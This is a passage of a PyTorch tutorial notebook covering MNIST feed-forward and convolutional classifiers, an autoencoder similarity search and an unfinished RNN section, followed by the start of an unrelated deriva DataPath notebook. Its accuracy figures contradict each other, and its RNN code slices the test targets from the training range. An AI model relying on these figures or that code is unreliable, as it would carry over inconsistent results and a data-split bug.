So we have batch 0 with 64 tensors of shape (1, 28, 28) and 64 targets. Let's ensure our network can forward propagate on this batch.
```
#image_ff_net(data_example)
```
**Question**: Debug this error
The first shape 1792 x 28 gives us a clue. We want the two 28 sized dimensions to be flattened. But it seems like the wrong dimensions are being flattened here.
1792 = 64 * 28
We need to rewrite our flatten layer.
```
#convert 28x28 image -> 784-dimensional flattened vector
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, inp):
return inp.flatten(start_dim=1, end_dim=-1)
Flatten()(data_example).shape
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
)
image_ff_net(data_example).shape
```
Let's combine all the elements together now and write our training loop.
```
#convert 28x28 image -> 784-dimensional flattened vector
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, inp):
return inp.flatten(start_dim=1, end_dim=-1)
#ARCHITECTURE
image_ff_net = nn.Sequential(Flatten(),
nn.Linear(784, 100),
nn.ReLU(),
nn.Linear(100, 10),
)
#LOSS CRITERION and OPTIMIZER
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(image_ff_net.parameters(), lr=1e-2)
#DATALOADERS
BATCH_SIZE = 16
train_dataloader = torch.utils.data.DataLoader(mnist_train,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
test_dataloader = torch.utils.data.DataLoader(mnist_test,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
image_ff_net.train() #don't worry about this (for this notebook)
image_ff_net.to(device)
N_EPOCHS = 20
for epoch in range(N_EPOCHS):
loss_list = []
for idx, (data_example, data_target) in enumerate(train_dataloader):
data_example = data_example.to(device)
data_target = data_target.to(device)
pred = image_ff_net(data_example)
loss = criterion(pred, data_target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_list.append(loss.item())
if epoch % 5 == 0:
print(f'Epoch = {epoch} Loss = {np.mean(loss_list)}')
```
**Question**: Use your trained network to compute the accuracy on both the train and test sets.
```
image_ff_net = image_ff_net.eval() #don't worry about this (for this notebook)
```
We'll use argmax to extract the label with the highest probability (or the least negative raw score).
```
image_ff_net(data_example).argmax(dim=1)
train_pred, train_targets = torch.tensor([]), torch.tensor([])
with torch.no_grad(): #context manager for inference since we don't need the memory footprint of gradients
for idx, (data_example, data_target) in enumerate(train_dataloader):
data_example = data_example.to(device)
#make predictions
label_pred = image_ff_net(data_example).argmax(dim=1).float()
#concat and store both predictions and targets
label_pred = label_pred.to('cpu')
train_pred = torch.cat((train_pred, label_pred))
train_targets = torch.cat((train_targets, data_target.float()))
train_pred[0:10]
train_targets[0:10]
torch.sum(train_pred == train_targets).item() / train_pred.shape[0]
train_pred.shape[0]
assert(train_pred.shape == train_targets.shape)
train_accuracy = torch.sum(train_pred == train_targets).item() / train_pred.shape[0]
print(f'Train Accuracy = {train_accuracy:.4f}')
```
Here, I want to make an elementary remark about significant figures. While interpreting numbers like accuracy, it is important to realize how big your dataset and what impact flipping one example from a wrong prediction to the right prediction would have.
In our case, the train set has 60,000 examples. Suppose we were to flip one of the incorrectly predicted examples to a correct one (by changing the model, retraining etc etc.). This should change our accuracy, all other examples being the same, by
$$\frac{1}{60,000} = 1.66 * 10^{-5}$$
Any digits in the accuracy beyond the fifth place have no meaning! For our test set, we have 10,000 examples so we should only care at most about the 4th decimal place (10,000 being a "nice" number i.e. a power of 10 will ensure we never have more any way).
```
test_pred, test_targets = torch.tensor([]), torch.tensor([])
with torch.no_grad(): #context manager for inference since we don't need the memory footprint of gradients
for idx, (data_example, data_target) in enumerate(test_dataloader):
data_example = data_example.to(device)
#make predictions
label_pred = image_ff_net(data_example).argmax(dim=1).float()
#concat and store both predictions and targets
label_pred = label_pred.to('cpu')
test_pred = torch.cat((test_pred, label_pred))
test_targets = torch.cat((test_targets, data_target.float()))
assert(test_pred.shape == test_targets.shape)
test_accuracy = torch.sum(test_pred == test_targets).item() / test_pred.shape[0]
print(f'Test Accuracy = {test_accuracy:.4f}')
```
Great! so our simple neural network already does a great job on our task. At this stage, we would do several things:
* Look at the examples being classified incorrectly. Are these bad data examples? Would a person also have trouble classifying them?
* Test stability - what happens if we rotate images? Translate them? Flip symmetric digits? What happens if we add some random noise to the pixel values?
While we might add these to future iterations of this notebook, let's move on to some other architectural choices. One of the issues with flattening the input image is that of **locality**. Images have a notion of locality. If a pixel contains part of an object, its neighboring pixels are very likely to contain the same object. But when we flatten an image, we use all the pixels to map to each hidden node in the next layer. If we could impose locality by changing our layers, we might get much better performance.
In addition, we would like image classification to be invariant to certain transformations like translation (move the digit up/down, left/right), scaling (zoom in and out without cropping the image), rotations (at least upto some angular width). Can we impose any of these by our choice of layers?
The answer is yes! Convolutional layers are layers designed specifically to capture such locality and preserve translational invariance. There is a lot of material available describing what these are and we won't repeat it here. Instead, we'll repeat the training procedure above but with convolutional layers.
FUTURE TODO: Add analysis of incorrectly predicted examples
FUTURE TODO: add a notebook for image filters, convolutions etc.
Let's try a convolutional layer:
nn.Conv2d
which takes in the number of input channels (grayscale), number of output channels (we'll choose 20), kernel size (3x3) and run the transformations on some images.
```
idx, (data_example, target_example) = next(enumerate(train_dataloader))
print(data_example.shape)
print(nn.Conv2d(1, 20, 3)(data_example).shape)
```
**Question**: If you do know what convolutions are and how filters work, justify these shapes.
The first dimension is the batch size which remains unchanged, as expected. In the raw data, the second dimension is the number of channels i.e. grayscale only and the last two dimensions are the size of the image - 28x28.
We choose 20 channels which explains the output's second dimension. Each filter is 3x3 and since we have no padding, it can only process 26 patches in each dimension.
If we label the pixels along the columns as 1, 2, ..., 28, the patch can be applied from pixels 1-3 (inclusive of both end-points), 2-5, ..., 26-28. After that, the patch "falls off" the image unless we apply some padding. This explains the dimension 26 in both directions.
We can then apply a ReLU activation to all these activations.
```
(nn.ReLU()((nn.Conv2d(1, 20, 3)(data_example)))).shape
```
We should also apply some kind of pooling or averaging now. This reduces noise by picking disjoint, consecutive patches on the image and replacing them by some aggregate statistic like max or mean.
```
(nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(1, 20, 3)(data_example))))).shape
```
**A couple of notes**:
* Pytorch's functions like nn.ReLU() and nn.MaxPool2d() return functions that can apply operations. So, nn.MaxPool2d(kernel_size=2) returns a function that is then applied to the argument above.
* Chaining together the layers and activations and testing them out like above is very valuable as the first step in ensuring your network does what you want it to do.
In general, we would suggest the following steps when you are expressing a new network architecture:
* Build up your network using nn.Sequential if you are just assembling existing or user-defined layers, or by defining a new network class inheriting from nn.Module where you can define a custom forward function.
* Pick a small tensor containing your features and pass it through each step/layer. Ensure the dimensions of the input and output tensors to each layer make sense.
* Pick your loss and optimizer and train on a small batch. You should be able to overfit i.e. get almost zero loss on this small set. Neural networks are extremely flexible learners and if you can't overfit on a small batch, you either have a bug or need to add some more capacity (more nodes, more layers etc. -> more weights).
* Now you should train on the full train set and practice the usual cross-validation practices.
* Probe your model: add noise to the inputs, see where the model isn't performing well, make partial dependency plots etc. to understand characteristics of your model. This part can be very open-ended and it depends on what your final aim is. If you are building a model to predict the stock price so you can trade, you'll spend a lot of time in this step. If you are having fun predicting dogs vs cats, maybe you don't care so much. If your aim is to dive deeper into deep learning, looking at the weights, activations, effect of changing hyperparameters, removing edges/weights etc. are very valuable experiments.
So we have seen one iteration of applying a convolutional layer followed by a non-linearity and then a max pooling layer. We can add more and more of these elements. As you can see, at each step, we are increasing the number of channels increase but the size of the images decreases because of the convolutions and max pooling.
**Question**: Feed a small batch through two sequences of Conv -> Relu -> Max pool. What is the output size now?
```
print(data_example.shape)
#1 channel in, 16 channels out
out1 = nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(1, 16, 3)(data_example))))
print(out1.shape)
#16 channels in, 32 channels out
out2 = nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(16, 32, 3)(out1))))
print(out2.shape)
#32 channels in, 128 channels out
out3 = nn.MaxPool2d(kernel_size=2)(nn.ReLU()((nn.Conv2d(32, 128, 3)(out2))))
print(out3.shape)
```
Recall that we want the output layer to have 10 outputs. We can add a linear/dense layer to do that.
```
#nn.Linear(128, 10)(out3)
```
**Question**: Debug and fix this error. Hint: look at dimensions.
```
nn.Linear(128, 10)(Flatten()(out3)).shape
```
It's time to put all these elements together.
```
#ARCHITECTURE
image_conv_net = nn.Sequential(nn.Conv2d(1, 16, 3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(16, 64, 3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
nn.Conv2d(64, 128, 3),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2),
Flatten(),
nn.Linear(128, 10)
)
#LOSS CRITERION and OPTIMIZER
criterion = nn.CrossEntropyLoss() #ensure no softmax in the last layer above
optimizer = optim.Adam(image_conv_net.parameters(), lr=1e-2)
#DATALOADERS
BATCH_SIZE = 16
train_dataloader = torch.utils.data.DataLoader(mnist_train,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
test_dataloader = torch.utils.data.DataLoader(mnist_test,
batch_size=BATCH_SIZE,
shuffle=True, #shuffle data
num_workers=8,
pin_memory=True
)
```
Train the model. Ideally, write a function so we don't have to repeat this cell again.
```
def train_image_model(model, train_dataloader, loss_criterion, optimizer, N_epochs = 20):
model.train() #don't worry about this (for this notebook)
model.to(device)
for epoch in range(N_epochs):
loss_list = []
for idx, (data_example, data_target) in enumerate(train_dataloader):
data_example = data_example.to(device)
data_target = data_target.to(device)
pred = model(data_example)
loss = loss_criterion(pred, data_target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_list.append(loss.item())
if epoch % 5 == 0:
print(f'Epoch = {epoch} Loss = {np.mean(loss_list)}')
return model
image_conv_net = train_image_model(image_conv_net,
train_dataloader,
criterion,
optimizer)
```
Let's also add a function to do inference and compute accuracy
```
def predict_image_model(model, dataloader):
pred, targets = torch.tensor([]), torch.tensor([])
with torch.no_grad(): #context manager for inference since we don't need the memory footprint of gradients
for idx, (data_example, data_target) in enumerate(dataloader):
data_example = data_example.to(device)
#make predictions
label_pred = model(data_example).argmax(dim=1).float()
#concat and store both predictions and targets
label_pred = label_pred.to('cpu')
pred = torch.cat((pred, label_pred))
targets = torch.cat((targets, data_target.float()))
return pred, targets
train_pred, train_targets = predict_image_model(image_conv_net, train_dataloader)
test_pred, test_targets = predict_image_model(image_conv_net, test_dataloader)
assert(train_pred.shape == train_targets.shape)
train_accuracy = torch.sum(train_pred == train_targets).item() / train_pred.shape[0]
print(f'Train Accuracy = {train_accuracy:.4f}')
assert(test_pred.shape == test_targets.shape)
test_accuracy = torch.sum(test_pred == test_targets).item() / test_pred.shape[0]
print(f'Test Accuracy = {test_accuracy:.4f}')
```
In my case, the test accuracy went from 96.89% to 97.28%. You might see different numbers due to random initialization of weights and different stochastic batches. Is this significant?
**Note**: If you chose a small sample of the data, a convolutional neural net might actually do worse than the feed-forward network.
**Question**: Do you think the increase in accuracy is significant? Justify your answer.
We have 10,000 examples in the test set. With the feed-forward network, we predicted 9728 examples correctly and with the convolutional net, we predicted 9840 correctly.
We can treat the model as a binomial distribution. Recall the binomial distribution describes the number of heads one gets on a coin which has probability $p$ of giving heads and $1-p$ of giving tails if the coin is tossed $N$ times. More formally, the average number of heads will be:
$$Np$$
and the standard deviation is:
$$\sqrt{Np(1-p)}$$
We'll do a rough back-of-the-envelope calculation. Suppose the true $p$ is what our feed-forward network gave us i.e. $p = 0.9728$ and $N = 10,000$.
Then, the standard deviation is:
$$\sqrt{10000 * 0.9728 * (1-0.9728)} \approx 17$$
So, to go from 9728 to 9840, we would need ~6.6 standard deviations which is very unlikely. This strongly suggests that the convolutional neural net does give us a significant boost in accuracy as we expected.
You can get a sense of the state-of-the-art on MNIST here: http://yann.lecun.com/exdb/mnist/
Note: MNIST is generally considered a "solved" dataset i.e. it is no longer and hasn't been for a few years, challenging enough as a benchmark for image classification models. You can check out more datasets (CIFAR, Imagenet etc., MNIST on Kannada characters, fashion MNIST etc.) in torchvision.datasets.
**A note about preprocessing**: Image pixels takes values between 0 and 255 (inclusive). In the MNIST data here, all the values are scaled down to be between 0 and 1 by dividing by 255. Often it is helpful to subtract the mean for each pixel to help gradient descent converge faster. As an **exercise**, it is highly encouraged to re-train both the feed-forward and convolutional network with zero-mean images.
Ensure that the means are computed only on the train set and applied to the test set.
#### Autoencoders
We have come a long way but there's still a lot more to do and see. While we have a lot of labelled data, the vast majority of data is unlabelled. There can be various reasons for this. It might be hard to find experts who can label the data or it is very expensive to do so. So another question is whether we can learn something about a dataset without labels. This is a very broad and difficult field called **unsupervised learning** but we can explore it a bit.
Suppose we had the MNIST images but no labels. We can no longer build a classification model with it. But we would still like to see if there are broad categories or groups or clusters within the data. Now, we didn't cover techniques like K-means clustering this week but they are definitely an option here. Since this is a class on deep learning, we want to use neural networks.
One option is to use networks called **autoencoders**. Since we can't use the labels, we'll instead predict the image itself! In other words, the network takes an image as an input and tries to predict it again. This is the identity mapping:
$$i(x) = x$$
The trick is to force the network to compress the input. In other words, if we have 784 pixels in the input (and the output), we want the hidden layers to use far less than 784 values. Let's try this.
**Note**: I am being sloppy here by pasting the same training code several times. Ideally, I would abstract away the training and inference pieces in functions inside a module.
```
#convert 28x28 image -> 784-dimensional flattened vector
#redefining for convenience
class Flatten(nn.Module):
def __init__(self):
super(Flatten, self).__init__()
def forward(self, inp):
return inp.flatten(start_dim=1, end_dim=-1)
class AE(nn.Module):
def __init__(self, N_input, N_hidden_nodes):
super(AE, self).__init__()
self.net = nn.Sequential(Flatten(),
nn.Linear(N_input, N_hidden_nodes),
nn.ReLU(),
nn.Linear(N_hidden_nodes, N_input),
nn.Sigmoid()
)
def forward(self, inp):
out = self.net(inp)
out = out.view(-1, 28, 28).unsqueeze(1) #return [BATCH_SIZE, 1, 28, 28]
return out
image_ff_ae = AE(784, 50) #we are choosing 50 hidden activations
_, (data_example, _) = next(enumerate(train_dataloader))
print(data_example.shape)
print(image_ff_ae(data_example).shape)
criterion = nn.MSELoss()
optimizer = optim.Adam(image_ff_ae.parameters(), lr=1e-2)
criterion(image_ff_ae(data_example), data_example)
def train_image_ae(model, train_dataloader, loss_criterion, optimizer, N_epochs = 20):
model.train() #don't worry about this (for this notebook)
model.to(device)
for epoch in range(N_epochs):
loss_list = []
for idx, (data_example, _) in enumerate(train_dataloader):
#Note we don't need the targets/labels here anymore!
data_example = data_example.to(device)
pred = model(data_example)
loss = loss_criterion(pred, data_example)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_list.append(loss.item())
if epoch % 5 == 0:
print(f'Epoch = {epoch} Loss = {np.mean(loss_list)}')
return model
image_ff_ae = train_image_ae(image_ff_ae, train_dataloader, criterion, optimizer, N_epochs=20)
```
Let's look at a few examples of outputs of our autoencoder.
```
image_ff_ae.to('cpu')
output_ae = image_ff_ae(data_example)
idx = 15 #change this to see different examples
plt.figure()
plt.imshow(data_example[idx][0].detach().numpy())
plt.figure()
plt.imshow(output_ae[idx][0].detach().numpy())
```
So, great - we have a neural network that can predict the input from the input. Is this useful? Recall that we had an intermediate layer that had 50 activations. Feel free to change this number around and see what happens.
We are compressing 784 pixel values into 50 activations and then reconstructing the image from those 50 values. In other words, we are forcing the neural network to capture only relevant non-linear features that can help it remember what image the input was.
The compression is not perfect as you can see in the reconstructed image above but it's pretty good. Training for more time or better training methods might improve this.
So how exactly is this useful. Maybe:
* Using an autoencoder to do lossy compression. Image storing the 50 activations instead of each image and storing the last layer (the "decoder") that constructs the image from the 50 activations.
* For search: suppose we wanted to search for a target image in a database of N images. We could do N pixel-by-pixel matches but these won't work because even a slight change in position or orientation or pixel intensities will give misleading distances between images. But if we use the vector of intermediate (50, in this case) activations, then maybe we can do a search in the space of activations. Let's try that.
```
#full mnist data
print(mnist_train.data.float().shape)
```
Generally it's a good idea to split the forward function into an encoder and decoder function. Here we do it explicitly.
```
image_ff_ae.net
```
Compute the activations after the hidden relu
```
with torch.no_grad():
mnist_ae_act = image_ff_ae.net[2](image_ff_ae.net[1](image_ff_ae.net[0](mnist_train.data.float())))
mnist_ae_act.shape
```
Let's pick some example image
```
img_idx = 15 #between 0 and 60000-1
plt.imshow(mnist_train.data[img_idx])
```
Get the target image activation
```
target_img_act = mnist_ae_act[img_idx]
target_img_act
```
We will use the cosine distance between two vectors to find the nearest neighbors.
**Question**: Can you think of an elegant matrix-operation way of implementing this (so it can also run on a GPU)?
**Warning**: Always keep an eye out for memory usage. The full matrix of pairwise distances can be very large. Work with a subset of the data (even 100 images) if that's the case.
```
#to save memory, look at only first N images (1000 here)
mnist_ae_act = mnist_ae_act[0:1000, :]
```
The cosine distance between two points, $\vec{x}_i, \vec{x}_j$ is:
$$d_{ij} = \frac{\vec{x}_i . \vec{x}_j}{\lVert \vec{x}_i \rVert \lVert \vec{x}_j \rVert}$$
Now we can first normalize all the actiation vector so they have length 1.
```
torch.pow(mnist_ae_act, 2).sum(dim=1).shape
```
We can't divide a tensor of shape [60000, 50] (activations) by a tensor of shape [60000].
So first we have to unsqueeze (add an additional dimension) to get a shape [60000,1] and then broadcast/expand as the target tensor.
We should check that the first row contains the length of the first image's activations.
```
torch.pow(mnist_ae_act, 2).sum(dim=1).unsqueeze(1).expand_as(mnist_ae_act)
```
Now we can divide by the norm (don't forget the sqrt).
```
mnist_ae_act_norm = mnist_ae_act / torch.pow(torch.pow(mnist_ae_act, 2).sum(dim=1).unsqueeze(1).expand_as(mnist_ae_act), 0.5)
```
Let's check an example.
```
mnist_ae_act[10]
torch.pow(torch.pow(mnist_ae_act[10], 2).sum(), 0.5)
mnist_ae_act[10] / torch.pow(torch.pow(mnist_ae_act[10], 2).sum(), 0.5)
mnist_ae_act_norm[10]
```
Good! They are the same. We have confidence that we are normalizing the activation vectors correctly.
So now the cosine distance is:
$$d_{ij} = \vec{x}_i . \vec{x}_j$$
since all the vectors are of unit length.
**Question**: How would you compute this using matrix operations?
```
mnist_ae_act_norm.transpose(1, 0).shape
mnist_ae_act_norm.shape
ae_pairwise_cosine = torch.mm(mnist_ae_act_norm, mnist_ae_act_norm.transpose(1,0))
ae_pairwise_cosine.shape
ae_pairwise_cosine[0].shape
img_idx = 18 #between 0 and 60000-1
plt.imshow(mnist_train.data[img_idx])
plt.title("Target image")
#find closest image
top5 = torch.sort(ae_pairwise_cosine[img_idx], descending=True) #or use argsort
top5_vals = top5.values[0:5]
top5_idx = top5.indices[0:5]
for i, idx in enumerate(top5_idx):
plt.figure()
plt.imshow(mnist_train.data[idx])
if i==0:
plt.title("Sanity check : same as input")
else:
plt.title(f"match {i} : cosine = {top5_vals[i]}")
```
While this is a simple dataset and a simple autoencoder, we already have some pretty good anecdotal similarity searches. There are many variations on autoencoders from switching layers to adding noise to the inputs (denoising autoencoders) to adding sparsity penalties to the hidden layer activations to encourage sparse activations to graphical models called variational autoencoders.
Delete activations and cosine distances to save memory
```
mnist_ae_act = None
mnist_ae_act_norm = None
ae_pairwise_cosine = None
```
# Conclusion
By now, you have had quite some experience with writing your own neural networks and introspecting into what they are doing. We still haven't touched topics like recurrent neural networks, seq2seq models and more modern applications. They will get added to this notebook so if you are interested, please revisit the repo.
## Future Items
Real problems
MNIST + autoencoder (convnet)
Trip Classification:
Maybe?
Transfer Learning
RNN toy problems
Linear trend + noise
Different data structuring strategies
Quadratic trend + noise
LSTM/GRUs for same problems
Seq2Seq examples
RNN Autoencoder
What data?
```
STOP HERE
```
### Recurrent Neural Networks (In progress)
**Note**: You might have run into memory issues by now. Everything below is self contained so if you want to reset the notebook and start from the cell below, it should work.
```
import torch
import torch.nn as nn
import torch.optim as optim
import matplotlib.pylab as plt
import pandas as pd
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
import copy
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device)
```
As before, let's generate some toy data.
```
def generate_rnn_data(N_examples=1000, noise_var = 0.1, lag=1, seed=None):
if seed is not None:
np.random.seed(seed)
ts = 4 + 3*np.arange(N_examples) + np.random.normal(0, noise_var)
features = ts[0:len(ts)-lag]
target = ts[lag:]
return features, target
features, target = generate_rnn_data()
```
This data is possibly the simplest time-series one could pick (apart from a constant value). It's a simple linear trend with a tiny bit of gaussian noise. Note that this is a **non-stationary** series!
```
plt.plot(features, 'p')
```
We want to predict the series at time t+1 given the value at time t (and history).
Of course, we could try using a feed-forward network for this. But instead, we'll use this to introduce recurrent neural networks.
Recall that the simplest possible recurrent neural network has a hidden layer that evolves in time, $h_t$, inputs $x_t$ and outputs $y_t$.
$$h_t = \sigma(W_{hh} h_{t-1} + W_{hx} x_t + b_h)$$
with outputs:
$$y_t = W_{yh} h_t + b_y$$
Since the output is an unbounded real value, we won't have an activation on the output.
Let's write our simple RNN. This is not general - we don't have the flexibility of adding more layers (as discussed in the lecture), bidirectionality etc. but we are in experimental mode so it's okay. Eventually, you can use pytorch's in-built torch.nn.RNN class definition.
```
N_input = 1 #will pass only one value as input
N_output = 1 #will predict one value
N_hidden = 32 #number of hidden dimensions to use
hidden_activation = nn.ReLU()
#define weights and biases
w_hh = nn.Parameter(data = torch.Tensor(N_hidden, N_hidden), requires_grad = True)
w_hx = nn.Parameter(data = torch.Tensor(N_hidden, N_input), requires_grad = True)
w_yh = nn.Parameter(data = torch.Tensor(N_output, N_hidden), requires_grad = True)
b_h = nn.Parameter(data = torch.Tensor(N_hidden, 1), requires_grad = True)
b_y = nn.Parameter(data = torch.Tensor(N_output, 1), requires_grad = True)
#initialize weights and biases (in-place)
nn.init.kaiming_uniform_(w_hh)
nn.init.kaiming_uniform_(w_hx)
nn.init.kaiming_uniform_(w_yh)
nn.init.zeros_(b_h)
nn.init.zeros_(b_y)
hidden_act = hidden_activation(torch.mm(w_hx, torch.ones(N_input, 1)) + \
torch.mm(w_hh, torch.ones(N_hidden, 1)) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output.shape)
```
But the input we'll be passing will be a time-series
```
inp_ts = torch.Tensor([1,2,3]).unsqueeze(1).unsqueeze(2)
print(inp_ts.shape)
inp_ts[0]
inp_ts[0].shape
hidden_act = torch.zeros(N_hidden, 1)
#-----------first iter--------
hidden_act = hidden_activation(torch.mm(w_hx, inp_ts[0]) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
#-----------second iter--------
hidden_act = hidden_activation(torch.mm(w_hx, inp_ts[1]) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
#-----------third iter--------
hidden_act = hidden_activation(torch.mm(w_hx, inp_ts[2]) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
hidden_act = torch.zeros(N_hidden, 1)
for x in inp_ts: #input time-series
hidden_act = hidden_activation(torch.mm(w_hx, x) + \
torch.mm(w_hh, hidden_act) + \
b_h)
print(hidden_act.shape)
output = (torch.mm(w_yh, hidden_act) + b_y)
print(output)
class RNN(nn.Module):
def __init__(self, N_input, N_hidden, N_output, hidden_activation):
super(RNN, self).__init__()
self.N_input = N_input
self.N_hidden = N_hidden
self.N_output = N_output
self.hidden_activation = hidden_activation
#define weights and biases
self.w_hh = nn.Parameter(data = torch.Tensor(N_hidden, N_hidden), requires_grad = True)
self.w_hx = nn.Parameter(data = torch.Tensor(N_hidden, N_input), requires_grad = True)
self.w_yh = nn.Parameter(data = torch.Tensor(N_output, N_hidden), requires_grad = True)
self.b_h = nn.Parameter(data = torch.Tensor(N_hidden, 1), requires_grad = True)
self.b_y = nn.Parameter(data = torch.Tensor(N_output, 1), requires_grad = True)
self.init_weights()
def init_weights(self):
nn.init.kaiming_uniform_(self.w_hh)
nn.init.kaiming_uniform_(self.w_hx)
nn.init.kaiming_uniform_(self.w_yh)
nn.init.zeros_(self.b_h)
nn.init.zeros_(self.b_y)
def forward(self, inp_ts, hidden_act=None):
if hidden_act is None:
#initialize to zero if hidden not passed
hidden_act = torch.zeros(self.N_hidden, 1)
output_vals = torch.tensor([])
for x in inp_ts: #input time-series
hidden_act = self.hidden_activation(torch.mm(self.w_hx, x) + \
torch.mm(self.w_hh, hidden_act) + \
self.b_h)
output = (torch.mm(self.w_yh, hidden_act) + self.b_y)
output_vals = torch.cat((output_vals, output))
return output_vals, hidden_act
rnn = RNN(N_input, N_hidden, N_output, hidden_activation)
output_vals, hidden_act = rnn(inp_ts)
print(output_vals)
print("---------")
print(hidden_act)
```
So far so good. Now how do we actually tune the weights? As before, we want to compute a loss between the predictions from the RNN and the labels. Once we have a loss, we can do the usual backpropagation and gradient descent.
Recall that our "features" are:
$$x_1, x_2, x_3\ldots$$
Our "targets" are:
$$x_2, x_3, x_4 \ldots$$
if the lag argument in generate_rnn_data is 1. More generally, it would be:
$$x_{1+\text{lag}}, x_{2+\text{lag}}, x_{3+\text{lag}}, \ldots$$
Now, let's focus on the operational aspects for a second. In principle, you would first feed $x_1$ as an input, generate an **estimate** for $\hat{x}_2$ as the output.
Ideally, this would be close to the actual value $x_2$ but that doesn't have to be the case, especially when the weights haven't been tuned yet. Now, for the second step, we need to input $x_2$ to the RNN. The question is whether we should use $\hat{x}_2$ or $x_2$.
In real-life, one can imagine forecasting a time-series into the future given values till time t. In this case, we would have to feed our prediction at time t, $\hat{x}_{t+1}$ as input at the next time-step since we don't know $x_{t+1}$.
The problem with this approach is that errors start compounding really fast. While we might be a bit off at $t+1$, if our prediction $\hat{x}_{t+1}$ is inaccurate, then our prediction $\hat{x}_{t+2}$ will be even worse and so on.
In our case, we'll use what's called **teacher forcing**. We'll always feed the actual known $x_t$ at time-step t instead of the prediction from the previous time-step, $\hat{x}_t$.
**Question**: Split the features and target into train and test sets.
```
N_examples = len(features)
TRAIN_PERC = 0.70
TRAIN_SPLIT = int(TRAIN_PERC * N_examples)
features_train = features[:TRAIN_SPLIT]
target_train = target[:TRAIN_SPLIT]
features_test = features[TRAIN_SPLIT:]
target_test = target[:TRAIN_SPLIT]
plt.plot(np.concatenate([features_train, features_test]))
plt.plot(features_train, label='train')
plt.plot(np.arange(len(features_train)+1, len(features)+1), features_test, label='test')
plt.legend()
criterion = nn.MSELoss()
optimizer = optim.Adam(rnn.parameters(), lr=1e-3)
N_input = 1 #will pass only one value as input
N_output = 1 #will predict one value
N_hidden = 32 #number of hidden dimensions to use
hidden_activation = nn.ReLU()
rnn = RNN(N_input, N_hidden, N_output, hidden_activation)
features_train = torch.tensor(features_train).unsqueeze(1).unsqueeze(2)
target_train = torch.tensor(target_train).unsqueeze(1).unsqueeze(2)
features_test = torch.tensor(features_test).unsqueeze(1).unsqueeze(2)
target_test = torch.tensor(target_test).unsqueeze(1).unsqueeze(2)
output_vals, hidden_act = rnn(features_train.float())
print(len(output_vals))
print(len(target_train))
loss = criterion(torch.tensor(output_vals).double(), target_train.squeeze(2).squeeze(1))
loss.requires_grad = True
print(loss)
optimizer.zero_grad()
loss.backward()
optimizer.step()
```
We can now put all these ingredients together
```
N_input = 1 #will pass only one value as input
N_output = 1 #will predict one value
N_hidden = 4 #number of hidden dimensions to use
hidden_activation = nn.Tanh()
rnn = RNN(N_input, N_hidden, N_output, hidden_activation)
criterion = nn.MSELoss()
optimizer = optim.Adam(rnn.parameters(), lr=1e-1)
N_epochs = 10000
hidden_act = None
for n in range(N_epochs):
output_vals, hidden_act = rnn(features_train.float(), hidden_act = None)
loss = criterion(output_vals, target_train.squeeze(1).float())
#loss.requires_grad = True
optimizer.zero_grad()
loss.backward()
optimizer.step()
if n % 100 == 0:
print(rnn.w_yh.grad)
print(f'loss = {loss}')
print(output_vals.requires_grad)
output_vals.shape
criterion(output_vals, target_train.squeeze(1).float())
features_train[0:10]
plt.plot([i.item() for i in output_vals])
plt.plot([i[0] for i in target_train.numpy()])
rnn.w_hh.grad
optimizer.zero_grad()
loss.requires_grad = True
loss.backward()
optimizer.step()
rnn.w_hh
rnn.w_hx.grad
```
| github_jupyter |
# DataPath Example 4
This notebook covers somewhat more advanced examples for using `DataPath`s. It assumes that you understand
the concepts presented in the previous example notebooks.
You should also read the ERMrest documentation and the derivapy wiki. There are more advanced concepts in this notebook that are demonstrated but not fully (re)explained here, as the concepts are explained in other documentation.
## Exampe Data Model
The examples require that you understand a little bit about the example catalog data model, which in this case manages data for biological experiments.
### Key tables
- `'dataset'` : represents a unit of data usually for a study or set of experiments;
- `'biosample'` : a biosample (describes biological details of a specimen);
- `'replicate'` : a replicate (describes both bio- and technical-replicates);
- `'experiment'` : a bioassay (any type of experiment or assay; e.g., imaging, RNA-seq, ChIP-seq, etc.).
### Relationships
- `dataset <- biosample`: A dataset may have one to many biosamples. I.e., there is a
foreign key reference from biosample to dataset.
- `dataset <- experiment`: A dataset may have one to many experiments. I.e., there
is a foreign key reference from experiment to dataset.
- `experiment <- replicate`: An experiment may have one to many replicates. I.e., there is a
foreign key reference from replicate to experiment.
```
# Import deriva modules and pandas DataFrame (for use in examples only)
from deriva.core import ErmrestCatalog, get_credential
from pandas import DataFrame
# Connect with the deriva catalog
protocol = 'https'
hostname = 'www.facebase.org'
catalog_number = 1
credential = None
# If you need to authenticate, use Deriva Auth agent and get the credential
# credential = get_credential(hostname)
catalog = ErmrestCatalog(protocol, hostname, catalog_number, credential)
# Get the path builder interface for this catalog
pb = catalog.getPathBuilder()
# Get some local variable handles to tables for convenience
dataset = pb.isa.dataset
experiment = pb.isa.experiment
biosample = pb.isa.biosample
replicate = pb.isa.replicate
```
